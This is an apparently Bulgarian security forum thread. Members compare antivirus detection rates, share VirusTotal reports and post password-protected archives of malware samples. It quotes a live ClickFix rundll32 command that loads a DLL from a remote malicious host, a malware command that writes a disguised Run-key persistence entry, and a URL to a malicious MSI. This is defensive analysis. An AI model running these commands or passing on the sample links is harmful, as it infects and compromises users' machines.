SEP 14 остави това https://www.virustotal.com/gui/file/0ef3b11323e22db7ff106edb65a0227507dc5c6cf8003fce198b2f4da392e34f

Злонамерен сайт ли е този https://www.game-game.com.ua/198731/ Реновираният SEP 14.4 така го класифицира и блокира достъп.

преди 19 минути, attj написа:

Злонамерен сайт ли е този https://www.game-game.com.ua/198731/ Реновираният SEP 14.4 така го класифицира и блокира достъп.

Bitdefender си мълчи...

преди 31 минути, attj написа:

Злонамерен сайт ли е този https://www.game-game.com.ua/198731/ Реновираният SEP 14.4 така го класифицира и блокира достъп.

Kasperky мълчи.

Malware analysis https://www.game-game.com.ua/198731/ No threats detected | ANY.RUN - Malware Sandbox Online

VirusTotal - URL

Няма заплахи и според 360 TS и Crowdstrike falcon. Симантек сега така класифицира и блокира много сайтове с торенти, онлайн-филми и игри. Преди не бе така. Реновираната корпоративна версия за пръв път е напът да изпадне от моите предпочитани. Борбата за авторските права не следва да се смесва с компютърната защита. Различни неща са.

https://www.upload.ee/files/19271690/Malware.rar.html

6 зловредни файла...Password : infected

Kaspersky - 3/6

На .msi предложи дезинфекция

Bitdefender с детекция 3/6....Ransomware модулът сработи при единия файл...

Няма да ползвам Симантек и Касперски -заради ненужното пресилено класифициране на сайтове с торенти, онлайнфилми и игри. Микрософт не арестува само това - при стартиране следва незабавно блокиране от автосандбокса на стената на Комодо https://www.virustotal.com/gui/file/16aa1ccfd99b90ee17e5e676b6927e8d3eac06fa2c0cefd0f84e4cb9f6b744a5

преди 13 минути, attj написа:

Няма да ползвам Симантек и Касперски -заради ненужното пресилено класифициране на сайтове с торенти, онлайнфилми и игри. Микрософт не арестува само това - при стартиране следва незабавно блокиране от автосандбокса на стената на Комодо https://www.virustotal.com/gui/file/16aa1ccfd99b90ee17e5e676b6927e8d3eac06fa2c0cefd0f84e4cb9f6b744a5

Аз вече съм коментирал, че само сканирам. При стартиране предполагам, че ще има друг резултат.

преди 10 минути, parmobil написа:

Аз вече съм коментирал, че само сканирам. При стартиране предполагам, че ще има друг резултат.

Може да хване още нещо. Обаче без хипс и автосандбокс липсва доподсигуряване.

преди 18 минути, attj написа:

Може да хване още нещо. Обаче без хипс и автосандбокс липсва доподсигуряване.

Хипс има, пясъчник няма.

преди 5 минути, parmobil написа:

Хипс има, пясъчник няма.

Свикнах да имам и двете безплатно. Може и сдвоено - при сложната комбинация на Кихчо с Варанчо. Там може и дори с изключен антивирус. Сега съм с Микрософт. И с тях се шегувам и получавам фишингимейли за финансови награди.

преди 4 часа, Лудият Учен написа:

https://www.upload.ee/files/19271690/Malware.rar.html

6 зловредни файла...Password : infected

Kaspersky - 5/6

VirusTotal - File - ddae94c0848fe81889b8b8c6489a2179fa964c0314687fee771ed16f9cdd08f2

Malware analysis ddae94c0848fe81889b8b8c6489a2179fa964c0314687fee771ed16f9cdd08f2.js No threats detected | ANY.RUN - Malware Sandbox Online

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"

преди 4 часа, B-boy/StyLe/ написа:

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"

Пратен.

пп. Няма друг такъв бъгав форум. Три пъти отказва да покаже изображението. Показва долу в поста ,че е прикачен ама не се вижда в поста.

Редактирано 22 април22 Апр от nikssi (преглед на промените)

преди 9 минути, nikssi написа:

Пратен.

пп. Няма друг такъв бъгав форум. Три пъти отказва да покаже изображението. Показва долу в поста ,че е прикачен ама не се вижда в поста.

Аз още не мога да пействам като хората...ама не само тук, ами и в malwarebytes форума. Те са със същата последна версия на форума. Или проблема е мен, щом не мога на 2 места с лисицата де пействам или е във форума, защото версията е 1:1 с тази тук. Навсякъде другаде мога...

преди 24 минути, B-boy/StyLe/ написа:

Аз още не мога да пействам като хората...ама не само тук, ами и в malwarebytes форума. Те са със същата последна версия на форума. Или проблема е мен, щом не мога на 2 места с лисицата де пействам или е във форума, защото версията е 1:1 с тази тук. Навсякъде другаде мога...

Вчера нямаше проблем с качване на картинки обаче днес ... хич не ми се разправя в темата с проблеми във форума. Ако имаше преглед преди да пусна поста нямааше заради една картинка да го редактирам три пъти. Да се оправят.

Редактирано 22 април22 Апр от nikssi (преглед на промените)

на 22.04.2026 г. в 11:56, B-boy/StyLe/ написа:

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"

VirusTotal - File - ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b

Отчет — ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4... — Kaspersky Threat Intelligence Portal

Редактирано 23 април23 Апр от nikssi (преглед на промените)

https://www.upload.ee/files/19277995/Malware_.rar.html

6 зловредни файла...Password : infected

Bitdefender с детекция 5/6...

преди 17 минути, Лудият Учен написа:

https://www.upload.ee/files/19277995/Malware_.rar.html

6 зловредни файла...Password : infected

Kaspersky - 5/6

Остатък: VirusTotal - File - a7dfe696c8c5b2c0fe8ac4d525e0fe13173af727204a0727a4014199c64bab11

Микрософт само това последното а7..... не арестува. При стартиране е незабавно блокирано от автосандбокса на Комодо.

преди 29 минути, nikssi написа:

Kaspersky - 5/6

Остатък: VirusTotal - File - a7dfe696c8c5b2c0fe8ac4d525e0fe13173af727204a0727a4014199c64bab11

Интересна гад. Използва в описанието си Revo.

cmd.exe /c start "" "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\zyUEMcUzcH7D.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Revo Health" /t REG_SZ /d "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\Microsoft Teams Revo Helper khy3O.exe" & start "" "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\Microsoft Teams Revo Helper khy3O.exe"

Още един зловреден MSI:

http://85[.]11[.]161[.]198[:]6600/qffww8ph/DTYOKUEN.msi"

https://www.virustotal.com/gui/file/c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728/detection

Би Бой с изключен автосандбокс ли пробва ?

преди 2 минути, attj написа:

Би Бой с изключен автосандбокс ли пробва ?

Кое да съм пробвал? Не съм пробвал, Тоше, има си виртуални пясъчници вече (за първия файл ако говориш).

А втория е пресен от нова ClickFix (FakeCaptcha) кампания. Един потребител му направи Deobfuscation, защото линка беше нарочно "усложнен". Но засичането, както се вижда не е добро.